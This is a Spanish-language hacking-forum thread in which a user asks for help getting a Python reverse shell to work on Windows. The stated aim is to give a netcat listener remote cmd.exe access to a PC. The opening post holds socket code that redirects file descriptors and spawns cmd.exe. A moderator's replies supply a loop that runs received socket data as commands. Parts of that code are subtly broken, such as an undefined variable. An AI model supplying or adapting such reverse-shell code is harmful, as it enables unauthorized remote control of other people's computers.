elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [PYTHON] Crear reverse shell con socket + netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [PYTHON] Crear reverse shell con socket + netcat  (Leído 4,345 veces)
Sentex

Desconectado Desconectado

Mensajes: 87


Programador


Ver Perfil WWW
[PYTHON] Crear reverse shell con socket + netcat
« en: 30 Septiembre 2017, 17:49 pm »

Hola buenas he buscado por google pero no he encontrado nada se que funciona en linux pero en windows me da error.

Código
  1. #!/usr/bin/python
  2.  
  3. import socket
  4. import subprocess
  5. import os
  6.  
  7. host = "127.0.0.1"
  8. port = 4444
  9.  
  10. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  11. s.connect((host, port))
  12. os.dup2(s.fileno(),0)
  13. os.dup2(s.fileno(),1)
  14. os.dup2(s.fileno(),2)
  15. p = subprocess.call(['cmd.exe'])
  16.  

y me salta el error de Bad file descriptor y no se por que.


En línea

Preguntas o peticiones en twitter o discord:

Discord: MrSentex#1227
Twitter: @fbi_sentex
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: [PYTHON] Crear reverse shell con socket + netcat
« Respuesta #1 en: 30 Septiembre 2017, 17:57 pm »

creo que es por tratar de manejar un socket como un archivo en windows... para que usas el socket como archivo?


En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Sentex

Desconectado Desconectado

Mensajes: 87


Programador


Ver Perfil WWW
Re: [PYTHON] Crear reverse shell con socket + netcat
« Respuesta #2 en: 30 Septiembre 2017, 18:02 pm »

Y como la hago con socket
En línea

Preguntas o peticiones en twitter o discord:

Discord: MrSentex#1227
Twitter: @fbi_sentex
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: [PYTHON] Crear reverse shell con socket + netcat
« Respuesta #3 en: 30 Septiembre 2017, 18:04 pm »

lo que no entiendo es lo que quieres... no le veo sentido a crear un duplicado del file descriptor allí...

despues del conect solo tienes que enviar y recibir datos... ya se termina allí el problema
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Sentex

Desconectado Desconectado

Mensajes: 87


Programador


Ver Perfil WWW
Re: [PYTHON] Crear reverse shell con socket + netcat
« Respuesta #4 en: 30 Septiembre 2017, 18:16 pm »

Como lo harías tu?
En línea

Preguntas o peticiones en twitter o discord:

Discord: MrSentex#1227
Twitter: @fbi_sentex
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: [PYTHON] Crear reverse shell con socket + netcat
« Respuesta #5 en: 30 Septiembre 2017, 18:21 pm »

Código
  1. #!/usr/bin/python
  2.  
  3. import socket
  4.  
  5. host = "127.0.0.1"
  6. port = 4444
  7.  
  8. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  9. s.connect((host, port))
  10.  
  11. while True:
  12. data = sock.recv(10240)#recibe hasta 10kb en una petición
  13. if data: print("se recibió:",data)
  14.  
  15.  

y listo... con la data haces lo que quieras... recv es bloqueante, así que es util muchas veces usar hilos
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Sentex

Desconectado Desconectado

Mensajes: 87


Programador


Ver Perfil WWW
Re: [PYTHON] Crear reverse shell con socket + netcat
« Respuesta #6 en: 1 Octubre 2017, 12:51 pm »

Pero lo que yo quiero hacer es crear una shell reversa de cmd con netcat de escucha por ahora con el codigo de arriba del todo funciona en linux pero en windows tengo que optar por descargar el archivo nc.exe.
En línea

Preguntas o peticiones en twitter o discord:

Discord: MrSentex#1227
Twitter: @fbi_sentex
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: [PYTHON] Crear reverse shell con socket + netcat
« Respuesta #7 en: 1 Octubre 2017, 22:14 pm »

teoricamente es lo mismo solo tienes que cambiar linea 13
Código
  1. if data: print("se recibió:",data)

por

Código
  1. if data: subprocess.call([data])


reviso en internet y sockets no parece producir ningún problema adicional al conectarse...

tu servidor está bien configurado?, te da algún error alguna de las 2 partes, sé tan detallista como puedas, no tengo nada con que ayudarte
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Sentex

Desconectado Desconectado

Mensajes: 87


Programador


Ver Perfil WWW
Re: [PYTHON] Crear reverse shell con socket + netcat
« Respuesta #8 en: 3 Octubre 2017, 20:51 pm »

No haber yo quiero hacer una shell reversa (cmd.exe) en un pc y que se conecte a mi por netcat.
En línea

Preguntas o peticiones en twitter o discord:

Discord: MrSentex#1227
Twitter: @fbi_sentex
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: [PYTHON] Crear reverse shell con socket + netcat
« Respuesta #9 en: 4 Octubre 2017, 02:05 am »

eso es una shell reversa XD...

es un programa
Código
  1. #!/usr/bin/python

que abre una conexión desde ella hacia tu servidor
Código
  1. host = "127.0.0.1"
  2. port = 4444
  3.  
  4. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  5. s.connect((host, port))

para ejecutar comandos que le envíes
Código
  1. while True:
  2. data = sock.recv(10240)#recibe hasta 10kb en una petición
  3. if data: subprocess.call([data])
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Backdoor reverse shell con netcat « 1 2 »
Hacking
skilled 14 13,105 Último mensaje 15 Enero 2012, 19:20 pm
por aporeg
Bind and Reverse Backdoor Shell con Netcat
Redes
Socket_0x01 0 4,022 Último mensaje 25 Febrero 2011, 05:07 am
por Socket_0x01
Usar subprocess a través de socket Python
Scripting
Sentex 0 1,486 Último mensaje 8 Marzo 2018, 12:03 pm
por Sentex
Cómo crear un payload tcp reverse android
Hacking
FAV_1994 0 2,536 Último mensaje 13 Mayo 2018, 00:39 am
por FAV_1994
Error en conexion de una shell reverse con netcat
Hacking
w4sp 2 3,413 Último mensaje 26 Junio 2020, 09:48 am
por w4sp
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines